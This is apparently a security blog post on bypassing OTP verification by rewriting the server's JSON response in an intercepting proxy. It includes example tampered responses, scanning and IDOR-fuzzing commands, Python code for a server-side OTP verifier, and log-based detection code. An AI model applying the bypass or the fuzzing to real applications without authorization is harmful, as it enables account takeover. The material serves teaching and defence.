Bypassing OTP Authentication via JSON Response Manipulation


A Proof of Concept (PoC) for a Broken Authentication vulnerability in an OTP system has been disclosed: the OTP check can be bypassed by manipulating the values in the server's JSON response, because the application trusts the client's view of the verification result instead of its own server-side state. Full details are available here: https://lnkd.in/gS-nnzwG.

You Should Know:

How the Exploit Works

1. Intercepting the OTP Request:

  • Use Burp Suite or OWASP ZAP as an intercepting proxy and capture the HTTP request that submits the OTP for verification.
  • Example intercepted request:

    POST /verify-otp HTTP/1.1
    Host: vulnerable-app.com
    Content-Type: application/json

    {"otp":"123456","user_id":"[email protected]"}

2. Modifying the JSON Response:

  • Submit a wrong code, intercept the server's reply and change `{"success":false}` to `{"success":true}` before it reaches the browser. In Burp this is done in Proxy > Intercept with response interception enabled (or with a Match and Replace rule on response bodies); Repeater only replays requests and shows the unmodified answer, so it cannot change what the client sees.
  • Example tampered response (the token value is whatever the attacker types in; the server never issued it):

    HTTP/1.1 200 OK
    Content-Type: application/json

    {"success":true,"session_token":"hacked_token"}

3. Bypassing Authentication:

  • If the front end decides "verified" from the response body, the tampered reply unlocks the post-OTP part of the application and the attacker lands in the authenticated UI without knowing the code.
  • The bypass has real effect only when the server's own state does not depend on the verification result: for example when the next step is a client-sent request carrying a flag such as otp_verified=true that the server trusts, when the protected data was already delivered to the client before verification, or when the application accepts a client-supplied token without checking that it was issued server-side. If the server creates the session only after verifying the code itself, the tampered response changes what the browser displays but not what the attacker is authorized to do.

Mitigation Steps

• Server-Side Validation: check the OTP on the server, create the session or token there only after a successful check, and authorize every later request against that server-side state. Whatever the client displays or sends back about the outcome is untrusted input.
• Rate Limiting: limit attempts per user and per code (invalidate the code after a small number of wrong guesses), limit attempts per source IP, and give each code a short lifetime, so that a 6-digit code cannot be brute-forced. fail2ban can add a network-level block once the application writes failed attempts to a log file, but it needs its own jail and filter for that log; the command below only adds an IP to the existing sshd jail and does nothing for the web application:

    sudo fail2ban-client set sshd banip <attacker_IP>

• Secure API Endpoints: HMAC-signing API requests protects the messages against tampering in transit and against replay, but it does not stop this attack, because the attacker is modifying traffic on a client they control. Signing complements server-side verification; it does not replace it.
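The following is an added example, not code from the original post or from the disclosed PoC. It puts the broken client-side gate from the exploit steps next to a server-side verifier that implements the mitigation list (server-held state, single-use codes, expiry, per-code attempt limit, constant-time comparison) and shows that flipping success:false to success:true in the proxy fools the client but not the server. The class names, the policy values and the token format are assumptions made for this illustration.

```python
"""Added example (not code from the original post or from the disclosed PoC):
a server-side OTP verifier next to the broken client-side gate, showing why
tampering with {"success":false} only fools the client unless the server
also trusts that flag. Class names, policy values and the token format are
assumptions made for this illustration."""
import hmac
import secrets
import time
from dataclasses import dataclass, field

MAX_ATTEMPTS = 5        # assumed policy: a code dies after 5 wrong guesses
OTP_TTL_SECONDS = 300   # assumed policy: a code is valid for 5 minutes


@dataclass
class PendingOtp:
    code: str
    issued_at: float
    attempts: int = 0


@dataclass
class OtpServer:
    """All verification state lives here; a session exists only if verify() created it."""
    pending: dict = field(default_factory=dict)   # user_id -> PendingOtp
    sessions: dict = field(default_factory=dict)  # session_token -> user_id

    def issue(self, user_id, now=None):
        """Generate a 6-digit code; it is delivered out of band, never in an HTTP reply."""
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[user_id] = PendingOtp(code, time.time() if now is None else now)
        return code

    def verify(self, user_id, otp, now=None):
        """Handler for POST /verify-otp. Returns the JSON body the server sends back."""
        now = time.time() if now is None else now
        entry = self.pending.get(user_id)
        if entry is None:
            return {"success": False, "error": "no pending code"}
        if now - entry.issued_at > OTP_TTL_SECONDS:
            del self.pending[user_id]
            return {"success": False, "error": "code expired"}
        if entry.attempts >= MAX_ATTEMPTS:
            return {"success": False, "error": "too many attempts"}
        entry.attempts += 1
        # constant-time comparison: a plain == leaks timing on the first differing digit
        if not hmac.compare_digest(entry.code.encode(), str(otp).encode()):
            return {"success": False}
        del self.pending[user_id]                # single use: the same code cannot be replayed
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user_id
        return {"success": True, "session_token": token}

    def is_authenticated(self, token):
        """Every later request is authorized against server state, not the client's flag."""
        return token in self.sessions


def vulnerable_client_gate(response):
    """The broken pattern: the front end decides it is verified from the body it received.
    Flipping success to true in the proxy is enough to get past this check."""
    return bool(response.get("success"))


def demo():
    """Attacker sends a wrong code, then rewrites the reply in the proxy."""
    srv = OtpServer()
    user = "victim"                                # constructed sample user
    code = srv.issue(user, now=1_700_000_000.0)
    wrong_guess = "000000" if code != "000000" else "111111"
    real_reply = srv.verify(user, wrong_guess, now=1_700_000_001.0)
    tampered = dict(real_reply, success=True, session_token="hacked_token")
    client_fooled = vulnerable_client_gate(tampered)      # True: the UI unlocks
    server_fooled = srv.is_authenticated("hacked_token")  # False: no such session exists
    return client_fooled, server_fooled


if __name__ == "__main__":
    print(demo())
```

The design point is that `sessions` is only ever written by `verify()`, so nothing the client can say about the outcome creates a session; the attempt counter lives on the pending code rather than on the request, so a brute-force attempt burns the code itself after MAX_ATTEMPTS guesses regardless of how many IPs it comes from.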

Testing with cURL

Send a deliberately wrong code and look at the raw server response. Repeating the request shows whether the server locks the code or throttles the source after a few failures (an endpoint that keeps answering {"success":false} without ever locking is brute-forceable), and comparing with a valid code shows whether the session token or cookie is set only on a genuine success.

    curl -X POST "https://vulnerable-app.com/verify-otp" \
      -H "Content-Type: application/json" \
      -d '{"otp":"000000","user_id":"admin"}'
      

Detecting Vulnerable Apps

Automated scanners do not find this class of flaw: it is a logic error in how verification state is split between client and server, and it has to be tested by hand with an intercepting proxy as shown above. The scans below are still useful for a first pass over the target's surface.

• Use Nikto for quick scans of known server misconfigurations:

    nikto -h https://target-app.com

• OWASP ZAP automated scan from the command line (with --self-contained, zap-cli starts its own ZAP instance using the given start options, then spiders and scans the target):

    zap-cli quick-scan --self-contained --spider -o "-config api.disablekey=true" https://target-app.com
        

What Undercode Say

This exploit highlights a critical flaw in client-side trust mechanisms. Always enforce server-side validation and issue the session (whether a cookie, a JWT or an OAuth2 token) only after the server itself has verified the code; the token format does not help if the token is handed out before verification. When auditing APIs, complement the manual proxy test with:

    # Service detection plus the nmap "vuln" script category (noisy; only against systems you are authorized to test)
    nmap -sV --script vuln target.com

    # Test for IDOR: fuzz the object identifier and look for 200 responses for IDs that belong to other users
    ffuf -u "https://api.com/user/FUZZ" -w wordlist.txt

On Windows, the CredentialsDelegation policy key controls CredSSP credential delegation (for example for RDP); it is not related to OTP handling, but it belongs in the same review when the audit also covers the host's authentication policy:

    Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation"

Use Wireshark or tshark to monitor API traffic. This display filter only matches cleartext HTTP; for HTTPS you need the TLS session keys (for example a key log written via SSLKEYLOGFILE) or an intercepting proxy, which is also where the JSON bodies are visible:

    tshark -i eth0 -Y "http.request.method == POST"

Logging Verification Attempts:

A secure OTP system never relies on the client's view of the outcome. Verify on the server, create the session only there, and log every verification attempt with user, source IP and result, so that brute-force bursts and sessions created without a successful verification can be spotted. The marker and the log file below are application-specific: /var/log/auth.log holds PAM and sshd events, not web-application events, unless the application logs through the syslog auth facility, so OTP_FAIL stands for whatever string your application actually emits:

    # Linux log inspection
    grep "OTP_FAIL" /var/log/auth.log

    # Windows Event Log: failed logons (ID 4625). These are OS logons, not application OTP checks,
    # unless the application writes its own events to the Security log.
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625}
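As an added example (not code from the original post), here is detection logic for the two signals that logging every attempt makes visible: a burst of failures from one source, and a session being created for a user whose last OTP check did not succeed, which is exactly the server-side symptom of the client-trusted flag described above. The log line format, the field names and the thresholds are assumptions, and the sample lines are constructed for this example; adapt the regex to whatever your application writes.

```python
"""Added example (not code from the original post): detection logic for the two
signals the logging advice above makes visible, run over constructed sample
log lines. The line format, field names and thresholds are assumptions; adapt
the regex to whatever your application actually writes."""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>otp_verify|session_created) "
    r"user=(?P<user>\S+) ip=(?P<ip>\S+)(?: result=(?P<result>OK|FAIL))?$"
)
FAIL_THRESHOLD = 5    # assumed: 5 failures from one IP ...
WINDOW_SECONDS = 60   # ... within 60 seconds counts as a brute-force attempt

# Constructed sample log: a burst of failures from one IP, a normal login (carol),
# and a session created for bob right after a FAILED verification.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z otp_verify user=alice ip=198.51.100.7 result=FAIL
2024-05-01T10:00:02Z otp_verify user=alice ip=198.51.100.7 result=FAIL
2024-05-01T10:00:04Z otp_verify user=alice ip=198.51.100.7 result=FAIL
2024-05-01T10:00:05Z otp_verify user=alice ip=198.51.100.7 result=FAIL
2024-05-01T10:00:07Z otp_verify user=alice ip=198.51.100.7 result=FAIL
2024-05-01T10:01:00Z otp_verify user=carol ip=203.0.113.9 result=OK
2024-05-01T10:01:01Z session_created user=carol ip=203.0.113.9
2024-05-01T10:02:00Z otp_verify user=bob ip=203.0.113.10 result=FAIL
2024-05-01T10:02:01Z session_created user=bob ip=203.0.113.10
2024-05-01T10:30:00Z otp_verify user=dave ip=198.51.100.7 result=FAIL
"""


def parse_line(line):
    """Return a dict for a recognised line, or None for anything else."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def detect(lines):
    """Return (alert_type, subject, timestamp) tuples in log order."""
    alerts = []
    fails_by_ip = defaultdict(deque)   # ip -> timestamps of recent failures
    last_result = {}                   # user -> result of the most recent otp_verify
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["event"] == "otp_verify":
            last_result[ev["user"]] = ev["result"]
            if ev["result"] == "FAIL":
                recent = fails_by_ip[ev["ip"]]
                recent.append(ev["ts"])
                # slide the window: drop failures older than WINDOW_SECONDS
                while (ev["ts"] - recent[0]).total_seconds() > WINDOW_SECONDS:
                    recent.popleft()
                if len(recent) >= FAIL_THRESHOLD:
                    alerts.append(("otp_bruteforce", ev["ip"], ev["ts"]))
                    recent.clear()     # one alert per burst, not one per extra failure
        else:
            # A session for a user whose last OTP check did not succeed means the
            # session was granted on something other than server-side verification.
            if last_result.get(ev["user"]) != "OK":
                alerts.append(("session_without_otp_success", ev["user"], ev["ts"]))
    return alerts


def detect_sample():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in detect_sample():
        print(*alert)
```

Run stand-alone it prints one otp_bruteforce alert for 198.51.100.7 and one session_without_otp_success alert for bob; carol's session follows a successful check and produces nothing, and dave's single failure stays below the threshold.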
      

For further hardening, refer to the OWASP Authentication Cheat Sheet.

      References:

      Reported By: Ilham00 Saya – Hackers Feeds
